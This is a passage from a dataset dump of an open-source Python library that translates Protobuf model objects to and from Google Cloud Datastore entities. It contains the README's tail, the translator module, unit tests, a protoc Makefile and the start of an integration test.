https://github.com/protocolbuffers/protobuf/issues/1606\n* https://github.com/googleapis/google-cloud-python/issues/1402\n* https://github.com/googleapis/google-cloud-python/pull/1450\n* https://github.com/googleapis/google-cloud-python/pull/1329\n\n### Struct Field type\n\nThis library supports ``google.protobuf.Struct`` field type out of the box. Struct field values\nare serialized as an embedded entity.\n\nKeep in mind that ``google.protobuf.Struct`` field type mimics JSON type which only supports\n``number`` type for numeric values (https://github.com/protocolbuffers/protobuf/blob/master/src/google/protobuf/struct.proto#L62).\nThis means all the numbers (including integers) are represented as double precision floating\npoint values (internally on the Entity, that's stored as ``value_pb.double_value``).\n\n## Translator Libraries for Other Programming Languages\n\nThis section contains a list of translator libraries for other programming languages which offer\nthe same functionality.\n\n* Golang - [go-protobuf-cloud-datastore-entity-translator](https://github.com/Sheshagiri/go-protobuf-cloud-datastore-entity-translator)\n\n## Tests\n\nUnit and integration tests can be found inside ``tests/`` directory.\n\nYou can run unit and integration tests and other lint checks by using tox.\n\n```bash\n# Run all tox targets\ntox\n\n# Run only lint checks\ntox -e lint\n\n# Run unit tests under Python 2.7\ntox -e py2.7-unit-tests\n\n# Run Integration tests under Python 3.7\ntox -e py3.7-integration-tests\n\n# Run unit and integration tests and generate and display code coverage report\ntox -e coverage\n```\n\nNOTE 1: Integration tests depend on the Google Cloud Datastore Emulator to be running\n(``./scripts/run-datastore-emulator.sh``).\n\nNOTE 2: Integration tests also run cross programming language compatibility tests which\nverify that the Python and Go translator libraries produce exactly the same output. As such,\nthose tests also require Golang >= 1.12 to be installed on the system.\n\n## License\n\nCopyright 2019 Tomaz Muraus\n\nCopyright 2019 Extreme Networks, Inc\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use this work except\nin compliance with the License. You may obtain a copy of the License in the [LICENSE](LICENSE) file,\nor at:\n\n[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)\n\nBy contributing you agree that these contributions are your own (or approved by your employer) and\nyou grant a full, complete, irrevocable copyright license to all users and developers of the\nproject, present and future, pursuant to the license of the project.\n" }, { "alpha_fraction": 0.6151993870735168, "alphanum_fraction": 0.6175258159637451, "avg_line_length": 42.90860366821289, "blob_id": "15ab6cc0d7852edd34f65a60b3dc8bbe04c8c700", "content_id": "624f4b60cf4310e1818aac1fd5e6e83a4093be99", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24501, "license_type": "permissive", "max_line_length": 100, "num_lines": 558, "path": "/protobuf_cloud_datastore_translator/translator.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nimport importlib\n\nfrom typing import Any\nfrom typing import Type\nfrom typing import cast\nfrom typing import Optional\nfrom typing import Union\nfrom typing import List\nfrom typing import TypeVar\nfrom types import ModuleType\nfrom datetime import datetime\n\nimport six\n\nfrom google.type import latlng_pb2\nfrom google.cloud import datastore\nfrom google.cloud.datastore_v1.proto import entity_pb2\nfrom google.cloud.datastore.helpers import GeoPoint\nfrom google.cloud.datastore_v1.types import Value\nfrom google.protobuf import message\nfrom google.protobuf import timestamp_pb2\nfrom google.protobuf import struct_pb2\nfrom google.protobuf import descriptor\nfrom google.protobuf.internal.well_known_types import _GetStructValue # type: ignore\nfrom google.protobuf.pyext.cpp_message import GeneratedProtocolMessageType # NOQA\n\nfrom google.protobuf.descriptor import FieldDescriptor\nfrom google.protobuf.pyext._message import MessageMapContainer\nfrom google.protobuf.pyext._message import ScalarMapContainer\nfrom google.protobuf.pyext._message import RepeatedScalarContainer\nfrom google.protobuf.pyext._message import RepeatedCompositeContainer\n\n__all__ = [\n 'model_pb_to_entity_pb',\n 'model_pb_with_key_to_entity_pb',\n 'entity_pb_to_model_pb'\n]\n\n# Type which represents an arbitrary ModelPB class which is a subclass of message.Message\nT_model_pb = TypeVar('T_model_pb', bound=message.Message)\n\nU_model_class_or_instance = Union[message.Message, Type[GeneratedProtocolMessageType]]\n\n# String name for exclude from index extension which signals this library which model\n# fields should be excluded from index\nEXCLUDE_FROM_INDEX_EXT_NAME = 'exclude_from_index'\n\n\ndef model_pb_with_key_to_entity_pb(client, model_pb, exclude_falsy_values=False,\n exclude_from_index=None):\n # type: (datastore.Client, message.Message, bool, Optional[List[str]]) -> entity_pb2.Entity\n \"\"\"\n Same as \"model_pb_to_entity_pb\", but it assumes model_pb which is passed to this function also\n contains \"key\" string field which is used to construct a primary key for the Entity PB object.\n\n NOTE: Datastore client instance needs to be passed to this method so\n namespace and project can be inferred from it (namespace_id and project_id are used as part of\n a composite primary key).\n \"\"\"\n entity_pb = model_pb_to_entity_pb(model_pb=model_pb, exclude_falsy_values=exclude_falsy_values,\n exclude_from_index=exclude_from_index)\n\n if getattr(model_pb, 'key', None) is not None:\n # Special handling for top level key attribute which we assume will service as a primary\n # key (if provided)\n # NOTE: We use model name as the value for \"kind\" part of the key. Aka if Protobuf\n # message name is \"MyClassDBModel\", kind will be set to \"MyClassDBModel\"\n model_name = model_pb.DESCRIPTOR.name\n\n key_str = model_pb.key # type: ignore\n key_pb = client.key(model_name, key_str).to_protobuf()\n entity_pb.key.CopyFrom(key_pb) # pylint: disable=no-member\n\n return entity_pb\n\n\ndef model_pb_to_entity_pb(model_pb, exclude_falsy_values=False, exclude_from_index=None):\n # type: (message.Message, bool, Optional[List[str]]) -> entity_pb2.Entity\n \"\"\"\n Translate Protobuf based database model object to Entity object which can be used with Google\n Datastore client library.\n\n :param model_pb: Instance of a custom Protobuf object to translate.\n\n :param exclude_falsy_values: True to exclude field values which are falsy (e.g. None, False,\n '', 0, etc.) and match the default values.\n\n NOTE: Due to the design of protobuf v3, there is no way to\n distinguish between a user explicitly providing a value which is\n the same as a default value (e.g. 0 for an integer field) and\n user not providing a value and default value being used instead.\n\n :param exclude_from_index: Optional list of field names which should not be indexed. By\n default, all the simple fields are indexed.\n\n NOTE: If provided, this value has high precedence over\n \"exclude_from_index\" message option defined on the model.\n \"\"\"\n exclude_from_index = exclude_from_index or []\n\n if not isinstance(model_pb, message.Message):\n raise ValueError('model_pb argument is not a valid Protobuf class instance')\n\n fields = list(iter(model_pb.DESCRIPTOR.fields))\n fields = [field for field in fields if field not in ['key']]\n\n entity_pb = entity_pb2.Entity()\n\n exclude_from_index = cast(list, exclude_from_index)\n\n for field_descriptor in fields:\n field_type = field_descriptor.type\n field_name = field_descriptor.name\n field_value = getattr(model_pb, field_name, None)\n\n if field_value is None:\n # Value not set or it uses a default value, skip it\n # NOTE: proto3 syntax doesn't support HasField() anymore so there is now way for us to\n # determine if a value is set / provided so we just use and return default values.\n continue\n\n if exclude_falsy_values and not field_value:\n continue\n\n attr_type = get_pb_attr_type(field_value)\n\n value_pb = None\n if attr_type == 'array_value':\n if len(field_value) == 0:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n array_value = entity_pb2.ArrayValue(values=[])\n value_pb.array_value.CopyFrom(array_value)\n else:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n\n for value in field_value:\n if field_type == descriptor.FieldDescriptor.TYPE_MESSAGE:\n # Nested message type\n entity_pb_item = model_pb_to_entity_pb(value)\n value_pb_item = entity_pb2.Value()\n\n # pylint: disable=no-member\n value_pb_item.entity_value.CopyFrom(entity_pb_item)\n # pylint: enable=no-member\n else:\n # Simple type\n value_pb_item = entity_pb2.Value()\n value_pb_item = set_value_pb_item_value(value_pb=value_pb_item, value=value)\n\n value_pb.array_value.values.append(value_pb_item)\n elif field_type == descriptor.FieldDescriptor.TYPE_STRING:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.string_value = field_value\n elif field_type in [descriptor.FieldDescriptor.TYPE_DOUBLE,\n descriptor.FieldDescriptor.TYPE_FLOAT]:\n # NOTE: Datastore only supports double type so we map float to double\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.double_value = field_value\n elif field_type in [descriptor.FieldDescriptor.TYPE_INT32,\n descriptor.FieldDescriptor.TYPE_INT64]:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.integer_value = field_value\n elif field_type == descriptor.FieldDescriptor.TYPE_ENUM:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n\n if field_descriptor.enum_type.name == 'NullValue':\n # NULL value\n value_pb.null_value = struct_pb2.NULL_VALUE\n else:\n # Regular ENUM\n value_pb.integer_value = field_value\n elif field_type == descriptor.FieldDescriptor.TYPE_BOOL:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.boolean_value = field_value\n elif field_type == descriptor.FieldDescriptor.TYPE_BYTES:\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n\n if isinstance(field_value, six.string_types):\n field_value = field_value.encode('utf-8')\n\n value_pb.blob_value = field_value\n elif field_type == descriptor.FieldDescriptor.TYPE_MESSAGE:\n # Complex type, convert to entity\n field_type = model_pb.DESCRIPTOR.fields_by_name[field_name]\n\n if field_type.message_type.full_name == 'google.protobuf.Timestamp':\n if str(field_value) == '':\n # Value not set\n # TODO: Include default empty value?\n # value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n # value_pb.timestamp_value.CopyFrom(field_value)\n continue\n\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.timestamp_value.CopyFrom(field_value)\n elif field_type.message_type.full_name == 'google.type.LatLng':\n if str(field_value) == '':\n # Value not set\n continue\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n value_pb.geo_point_value.CopyFrom(field_value)\n elif isinstance(field_value, MessageMapContainer):\n # Nested dictionary on a struct, set a value directory on a passed in pb object\n # which is a parent Struct entity\n entity_pb_item = get_entity_pb_for_value(value=field_value)\n entity_pb.CopyFrom(entity_pb_item)\n elif isinstance(field_value, ScalarMapContainer):\n # Custom user defined type, recurse into it\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n entity_pb_item = get_entity_pb_for_value(value=field_value)\n value_pb.entity_value.CopyFrom(entity_pb_item)\n elif field_type.message_type.full_name == 'google.protobuf.Struct':\n if not dict(field_value):\n # Value not set, skip it\n continue\n\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n entity_pb_item = get_entity_pb_for_value(value=field_value)\n value_pb.entity_value.CopyFrom(entity_pb_item)\n else:\n # Nested type, potentially referenced from another Protobuf definition file\n value_pb = datastore.helpers._new_value_pb(entity_pb, field_name)\n entity_pb_item = model_pb_to_entity_pb(field_value)\n value_pb.entity_value.CopyFrom(entity_pb_item)\n else:\n raise ValueError('Unsupported field type for field \"%s\"' % (field_name))\n\n if not value_pb:\n continue\n\n value_pb = cast(Value, value_pb)\n\n # Determine if field should be excluded from index\n exclude_field_from_indexes = exclude_field_from_index(model=model_pb,\n field_descriptor=field_descriptor,\n exclude_from_index=exclude_from_index)\n\n if exclude_field_from_indexes:\n # Field should be excluded from the index, mark that on the Entity Value\n value_pb.exclude_from_indexes = True\n\n return entity_pb\n\n\ndef entity_pb_to_model_pb(model_pb_class, # type: Type[T_model_pb]\n entity_pb, # type: entity_pb2.Entity\n strict=False # type: bool\n ):\n # type: (...) -> T_model_pb\n \"\"\"\n Translate Google Datastore Entity Protobuf object to Protobuf based database model object.\n\n :param model_pb_class: Protobuf class to convert the Entity object to.\n :param entity_pb: Entity Protobuf instance to convert to database model instance.\n :param strict: True to run in a strict mode and throw an exception if we encounter a field on\n the database object which is not defined on the model definition.\n \"\"\"\n model_pb_field_names = list(iter(model_pb_class.DESCRIPTOR.fields))\n model_pb_field_names = [field.name for field in model_pb_field_names if field not in ['key']]\n\n model_pb = model_pb_class()\n\n for prop_name, value_pb in datastore.helpers._property_tuples(entity_pb):\n value = datastore.helpers._get_value_from_value_pb(value_pb)\n\n # Field not defined on the model class\n if prop_name not in model_pb_field_names:\n if strict:\n msg = ('Database object contains field \"%s\" which is not defined on the database '\n 'model class \"%s\"' % (prop_name, model_pb.DESCRIPTOR.name))\n raise ValueError(msg)\n else:\n continue\n\n def set_model_pb_value(model_pb, prop_name, value, is_nested=False):\n model_pb_class = model_pb.__class__\n\n if isinstance(value, list):\n for item in value:\n if isinstance(item, dict):\n # Handle nested models\n if model_pb_class.DESCRIPTOR.fields_by_name[prop_name].message_type:\n field = model_pb_class.DESCRIPTOR.fields_by_name[prop_name]\n\n # Dynamically import nested model from a corresponding file\n nested_model_name = field.message_type.name\n nested_model_module = get_python_module_for_field(field=field)\n nested_model_class = getattr(nested_model_module, nested_model_name)\n\n # Instantiate an instance of nested field Protobuf class\n item_pb = nested_model_class()\n set_model_pb_value(item_pb, prop_name, item, is_nested=True)\n\n getattr(model_pb, prop_name).append(item_pb)\n elif isinstance(model_pb, struct_pb2.Struct):\n try:\n model_pb[prop_name]\n except ValueError:\n model_pb.update({prop_name: []})\n\n model_pb[prop_name].append(item)\n else:\n getattr(model_pb, prop_name).append(item)\n elif isinstance(value, dict):\n # We assume it's a referenced protobuf type if it doesn't contain \"update()\" method\n # google.protobuf.Struct and Map types contain \"update()\" methods so we can treat\n # them as simple dictionaries\n if is_nested:\n for key, value in six.iteritems(value):\n set_model_pb_value(model_pb, key, value)\n elif isinstance(model_pb, struct_pb2.Struct):\n model_pb.update({prop_name: value})\n else:\n field = model_pb_class.DESCRIPTOR.fields_by_name[prop_name]\n is_nested_model_type = (bool(field.message_type) and\n not hasattr(getattr(model_pb, prop_name, {}), 'update'))\n\n if is_nested_model_type:\n # Custom type definition potentially defined in different file\n field = model_pb_class.DESCRIPTOR.fields_by_name[prop_name]\n\n # Dynamically import nested model from a corresponding file\n nested_model_name = field.message_type.name\n nested_model_module = get_python_module_for_field(field=field)\n nested_model_class = getattr(nested_model_module, nested_model_name)\n\n item_pb = nested_model_class()\n set_model_pb_value(item_pb, prop_name, value, is_nested=True)\n\n getattr(model_pb, prop_name).CopyFrom(item_pb)\n else:\n getattr(model_pb, prop_name).update(dict(value))\n elif isinstance(value, datetime):\n getattr(model_pb, prop_name).FromDatetime(value)\n elif value is None:\n # NULL type\n setattr(model_pb, prop_name, 0)\n elif isinstance(value, GeoPoint):\n item_pb = latlng_pb2.LatLng(latitude=value.latitude, longitude=value.longitude)\n getattr(model_pb, prop_name).CopyFrom(item_pb)\n elif isinstance(model_pb, struct_pb2.Struct):\n model_pb.update({prop_name: value})\n else:\n setattr(model_pb, prop_name, value)\n\n set_model_pb_value(model_pb, prop_name, value)\n\n return model_pb\n\n\ndef get_pb_attr_type(value):\n # type: (Any) -> str\n \"\"\"\n Return protobuf attribute type for the provided Python or protobuf value.\n \"\"\"\n if isinstance(value, timestamp_pb2.Timestamp):\n name = 'timestamp'\n elif isinstance(value, bool):\n name = 'boolean'\n elif isinstance(value, float):\n name = 'double'\n elif isinstance(value, six.integer_types):\n name = 'integer'\n elif isinstance(value, six.text_type):\n name = 'string'\n elif isinstance(value, six.binary_type):\n name = 'blob'\n elif isinstance(value, (dict, ScalarMapContainer, MessageMapContainer, struct_pb2.Struct,\n message.Message)):\n name = 'dict'\n elif isinstance(value, (list, RepeatedScalarContainer, RepeatedCompositeContainer)):\n name = 'array'\n elif value is None:\n name = 'null'\n else:\n raise ValueError('Unknown protobuf attr type', type(value))\n\n return name + '_value'\n\n\ndef get_entity_pb_for_value(value):\n # type: (Any) -> entity_pb2.Entity\n \"\"\"\n Return Entity protobuf object for the provided Python value.\n \"\"\"\n entity_pb = entity_pb2.Entity()\n\n attr_type = get_pb_attr_type(value)\n\n if attr_type == 'dict_value':\n if six.PY2:\n value = dict(value)\n\n for key, value in six.iteritems(value):\n value_pb = datastore.helpers._new_value_pb(entity_pb, key)\n value_pb = set_value_pb_item_value(value_pb=value_pb, value=value, is_struct=True)\n else:\n raise ValueError('Unsupported attribute type: %s' % (attr_type))\n\n return entity_pb\n\n\ndef set_value_pb_item_value(value_pb, value, is_struct=False):\n # type: (entity_pb2.Value, Any, bool) -> entity_pb2.Value\n \"\"\"\n Set a value attribute on the Value object based on the type of the provided value.\n\n NOTE: For complex nested types (e.g. dicts and structs this function uses recursion).\n\n :param is_struct: True if the provided value is part of a struct. This is important because\n numbers inside struct field types are handled differently (only double number\n types are supported).\n \"\"\"\n if isinstance(value, struct_pb2.ListValue):\n # Cast special ListValue type to a list\n value = cast(Any, value)\n value = list(value)\n\n if isinstance(value, float) and value.is_integer() and not is_struct:\n # Special case because of how Protobuf handles ints in some scenarios (e.g. Struct)\n # Regular Entity value supports integeres and double number types, but Struct mimics\n # JSON so it only supports \"number\" type which is always a double\n value = cast(Any, value)\n value = int(value)\n\n if isinstance(value, six.text_type):\n value_pb.string_value = value\n elif isinstance(value, bool):\n value_pb.boolean_value = value\n elif isinstance(value, int):\n value_pb.integer_value = value\n elif isinstance(value, float):\n value_pb.double_value = value\n elif isinstance(value, six.binary_type):\n value_pb.blob_value = value\n elif isinstance(value, list):\n if len(value) == 0:\n array_value = entity_pb2.ArrayValue(values=[])\n value_pb.array_value.CopyFrom(array_value)\n else:\n for value in value:\n value_pb_item = entity_pb2.Value()\n value_pb_item = set_value_pb_item_value(value_pb=value_pb_item, value=value,\n is_struct=is_struct)\n\n value_pb.array_value.values.append(value_pb_item)\n elif isinstance(value, struct_pb2.Value):\n item_value = _GetStructValue(value)\n set_value_pb_item_value(value_pb, item_value, is_struct=is_struct)\n elif hasattr(value, 'DESCRIPTOR'):\n # Custom user-defined type\n entity_pb_item = model_pb_to_entity_pb(value, exclude_falsy_values=True)\n value_pb.entity_value.CopyFrom(entity_pb_item)\n elif value is None:\n value_pb.null_value = struct_pb2.NULL_VALUE\n else:\n raise ValueError('Unsupported type for value: %s' % (value))\n\n return value_pb\n\n\ndef exclude_field_from_index(model, field_descriptor, exclude_from_index=None):\n # type: (U_model_class_or_instance, FieldDescriptor, Optional[List[str]]) -> bool\n \"\"\"\n Return True if a particular field should be excluded from index, False otherwise.\n\n :param model: Either a Protobuf model class type or actual Protobuf model class instance.\n \"\"\"\n # Determine if field should be excluded from index based on the \"exclude_from_index\"\n # function argument value\n # NOTE: This value has precedence over field level option\n if exclude_from_index:\n if field_descriptor.name in exclude_from_index:\n return True\n else:\n return False\n\n # Determine if field should be excluded from index based on the custom\n # \"exclude_from_index\" field level option\n field_exts = field_descriptor.GetOptions().Extensions\n\n # Bail early to avoid unncessary extension processing if there are no extensions defined\n if len(field_exts) == 0: # type: ignore\n return False\n\n exclude_from_index_ext = None\n\n # If model file is part of a package, try searching for extension inside the package first\n if model.DESCRIPTOR.file.package:\n ext_name = '%s.%s' % (model.DESCRIPTOR.file.package, EXCLUDE_FROM_INDEX_EXT_NAME)\n exclude_from_index_ext = field_exts._FindExtensionByName(ext_name) # type: ignore\n\n # And if it's not found inside the package or the model is not part of a package, try to\n # search for it in a top level namespace\n if not exclude_from_index_ext:\n ext_name = EXCLUDE_FROM_INDEX_EXT_NAME\n exclude_from_index_ext = field_exts._FindExtensionByName(ext_name) # type: ignore\n\n if not exclude_from_index_ext:\n # Exclude from index extension not found\n return False\n\n try:\n exclude_from_index_ext_value = field_exts[exclude_from_index_ext]\n except KeyError:\n return False\n\n if exclude_from_index_ext_value is True:\n return True\n\n return False\n\n\ndef get_python_module_for_field(field):\n # type: (FieldDescriptor) -> ModuleType\n \"\"\"\n Return Python module for the provided Protobuf field.\n\n NOTE: This function will also import the module if it's not already available in sys.path.\n \"\"\"\n model_file = field.message_type.file.name\n module_name = model_file.replace('.proto', '_pb2').replace('/', '.')\n\n module = None\n\n # Check if module is already loaded\n if module_name in sys.modules:\n # Module already in sys.modules under the same import name\n module = sys.modules[module_name]\n else:\n # Check if module is in sys.modules under a different import name aka alias\n for name in sys.modules:\n if name.endswith(module_name):\n module = sys.modules[name]\n break\n\n if not module:\n # Module not in sys.modules, import it\n module = importlib.import_module(module_name)\n\n return module\n" }, { "alpha_fraction": 0.6831762790679932, "alphanum_fraction": 0.6895929574966431, "avg_line_length": 40.214874267578125, "blob_id": "8adca66a0b96e47ec3ccfc8fa816095f8a243201", "content_id": "c6b20c0727cdbad1f0d9275a31e2d83d2d077a78", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4987, "license_type": "permissive", "max_line_length": 99, "num_lines": 121, "path": "/tests/unit/test_utils.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# pylint: disable=all\n\nimport sys\nimport unittest\n\nimport mock\n\nfrom protobuf_cloud_datastore_translator.translator import get_python_module_for_field\nfrom protobuf_cloud_datastore_translator.utils import get_module_and_class_for_model_name\nfrom protobuf_cloud_datastore_translator.utils import get_exclude_from_index_fields_for_model\nfrom tests.generated import example_pb2\n\n\nclass UtilsTestCase(unittest.TestCase):\n def test_get_module_and_class_for_model_name_success(self):\n model_name = 'tests.generated.example_pb2.ExampleDBModel'\n module, model_class = get_module_and_class_for_model_name(model_name)\n self.assertEqual(module, example_pb2)\n self.assertEqual(model_class, example_pb2.ExampleDBModel)\n\n def test_get_module_and_class_for_model_name_invalid_module_name(self):\n expected_msg = 'Class \"some.not.found.Foo\" not found'\n self.assertRaisesRegexp(ValueError, expected_msg, get_module_and_class_for_model_name,\n 'some.not.found.Foo')\n\n expected_msg = 'Invalid module name:'\n self.assertRaisesRegexp(ValueError, expected_msg, get_module_and_class_for_model_name,\n 'invalid')\n\n def test_get_module_and_class_for_model_name_invalid_class_name(self):\n model_name = 'tests.generated.example_pb2.Foo'\n expected_msg = 'Class \"tests.generated.example_pb2.Foo\" not found'\n self.assertRaisesRegexp(ValueError, expected_msg, get_module_and_class_for_model_name,\n model_name)\n\n def test_get_python_module_for_field(self):\n module_name = 'example_pb2'\n full_module_name = 'tests.generated.example_pb2'\n\n # Module not in sys.module yet\n field = mock.Mock()\n field.message_type.file.name = module_name\n\n self._remove_module_from_sys_module(module_name)\n self._remove_module_from_sys_module(full_module_name)\n\n self.assertFalse(module_name in sys.modules)\n self.assertFalse(full_module_name in sys.modules)\n\n module = get_python_module_for_field(field=field)\n\n self.assertTrue(module)\n self.assertTrue(module_name in sys.modules)\n self.assertEqual(module.__name__, module_name)\n\n # Module already in sys.modules\n self.assertTrue(module_name in sys.modules)\n\n module = get_python_module_for_field(field=field)\n self.assertTrue(module)\n self.assertTrue(module_name in sys.modules)\n self.assertEqual(module.__name__, module_name)\n\n # Module already in sys.modules under an alias\n self._remove_module_from_sys_module(module_name)\n self._remove_module_from_sys_module(full_module_name)\n\n sys.modules[full_module_name] = module\n\n self.assertFalse(module_name in sys.modules)\n self.assertTrue(full_module_name in sys.modules)\n\n module = get_python_module_for_field(field=field)\n self.assertTrue(module)\n self.assertTrue(full_module_name in sys.modules)\n self.assertEqual(module.__name__, module_name)\n\n def test_get_python_module_for_field_invalid_module_name(self):\n field = mock.Mock()\n field.message_type.file.name = 'invalid.module'\n\n expected_msg = 'No module named'\n self.assertRaisesRegexp(ImportError, expected_msg,\n get_python_module_for_field, field)\n\n def test_get_exclude_from_index_fields(self):\n from tests.generated import example_with_options_pb2\n\n model_class = example_with_options_pb2.ExampleDBModelWithOptions1\n exclude_fields = get_exclude_from_index_fields_for_model(model_class=model_class)\n\n self.assertEqual(exclude_fields, ['string_key_one', 'string_key_three', 'int32_field_two'])\n\n model_class = example_with_options_pb2.ExampleDBModelWithOptions2\n exclude_fields = get_exclude_from_index_fields_for_model(model_class=model_class)\n\n self.assertEqual(exclude_fields, ['int32_field_two'])\n\n model_class = example_with_options_pb2.ExampleDBModelWithOptions3\n exclude_fields = get_exclude_from_index_fields_for_model(model_class=model_class)\n\n self.assertEqual(exclude_fields, [])\n\n def _remove_module_from_sys_module(self, module_name):\n if module_name in sys.modules:\n del sys.modules[module_name]\n" }, { "alpha_fraction": 0.7354056239128113, "alphanum_fraction": 0.7384381890296936, "avg_line_length": 46.10714340209961, "blob_id": "90a3c9ca2748c75cdb0725cef6d8eb160af2c0c0", "content_id": "9a1c0513a0fb414490c6f96750e31f96edc31195", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1319, "license_type": "permissive", "max_line_length": 125, "num_lines": 28, "path": "/Makefile", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": ".PHONY: all\nall: protobuf\n\n.PHONY: protobuf\nprotobuf: protobuf-python protobuf-go\n\n.PHONY: protobuf-python\nprotobuf-python:\n\techo \"Generating Python protobuf files...\"\n\tmkdir -p tests/generated/models\n\tmkdir -p tests/generated/compat\n\ttouch tests/generated/__init__.py\n\ttouch tests/generated/models/__init__.py\n\ttouch tests/generated/compat/__init__.py\n\tprotoc --proto_path=protobuf/ --mypy_out=tests/generated/ --python_out=tests/generated/ protobuf/*.proto\n\tprotoc --proto_path=protobuf/ --mypy_out=tests/generated/ --python_out=tests/generated/ protobuf/models/*.proto\n\tprotoc --proto_path=protobuf/ --mypy_out=tests/generated/ --python_out=tests/generated/ protobuf/compat/example_compat.proto\n\t# Workaround for Protobuf compiler not using relative imports which breakes things\n\tsed -i -E \"s/^from models(.*) import/from ..models\\1 import/\" tests/generated/*/*.py\n\tsed -i -E \"s/^from models(.*) import/from ..models\\1 import/\" tests/generated/*/*.pyi\n\tsed -i -E \"s/^import options(.*)/from . import options\\1/\" tests/generated/*.py\n\tsed -i -E \"s/^import options(.*)/from . import options\\1/\" tests/generated/*.pyi\n\n.PHONY: protobuf-go\nprotobuf-go:\n\techo \"Generating Go protobuf files...\"\n\tmkdir -p tests/generated/go/\n\tprotoc --proto_path=protobuf/ --go_out=tests/generated/go/ protobuf/compat/example_compat.proto\n" }, { "alpha_fraction": 0.6824575066566467, "alphanum_fraction": 0.6876352429389954, "avg_line_length": 44.403507232666016, "blob_id": "8f7cfdc23a96e53f5312251844d340913f9b2090", "content_id": "4221684004f615171ca0fce416be4be16c990d76", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12940, "license_type": "permissive", "max_line_length": 100, "num_lines": 285, "path": "/tests/integration/test_translator.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__all__ = [\n 'GoogleDatastoreTranslatorIntegrationTestCase'\n]\n\nimport sys\n\nfrom google.cloud import datastore\n\nfrom tests.generated import example_pb2\nfrom tests.mocks import EXAMPLE_DICT_POPULATED\nfrom tests.mocks import EXAMPLE_DICT_DEFAULT_VALUES\nfrom tests.mocks import EXAMPLE_PB_POPULATED\nfrom tests.mocks import EXAMPLE_PB_DEFAULT_VALUES\nfrom tests.integration.base import BaseDatastoreIntegrationTestCase\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\n\n__all__ = [\n 'GoogleDatastoreTranslatorIntegrationTestCase'\n]\n\n\nclass GoogleDatastoreTranslatorIntegrationTestCase(BaseDatastoreIntegrationTestCase):\n \"\"\"\n NOTE: Those tests rely on datastore emulator running (gcloud beta emulator datastore start\n --no-store-on-disk).\n \"\"\"\n\n def setUp(self):\n super(GoogleDatastoreTranslatorIntegrationTestCase, self).setUp()\n\n modules_to_remove = [\n 'tests.generated.options_pb2',\n 'tests.generated.models.options_pb2',\n 'tests.generated.example_with_options_pb2',\n 'tests.generated.models.example_with_options_pb2',\n ]\n\n for module_name in modules_to_remove:\n if module_name in sys.modules:\n del sys.modules[module_name]\n\n def test_store_and_retrieve_populated_translated_object_from_datastore(self):\n # type: () -> None\n \"\"\"\n Test case which stores raw entity object in the datastore and verifies it matched the\n same object which is stored using translated Protobuf definition.\n \"\"\"\n key_native = self.client.key('ExampleModel', 'native_entity_populated')\n\n entity_native = datastore.Entity(key=key_native)\n entity_native.update(EXAMPLE_DICT_POPULATED)\n self.client.put(entity_native)\n\n entity_native_retrieved = self.client.get(key_native)\n self.assertTrue(entity_native_retrieved)\n\n # Verify retrieved data matches the original input\n self.assertEqual(entity_native_retrieved, EXAMPLE_DICT_POPULATED)\n\n # Store custom Protobuf object in a datastore by 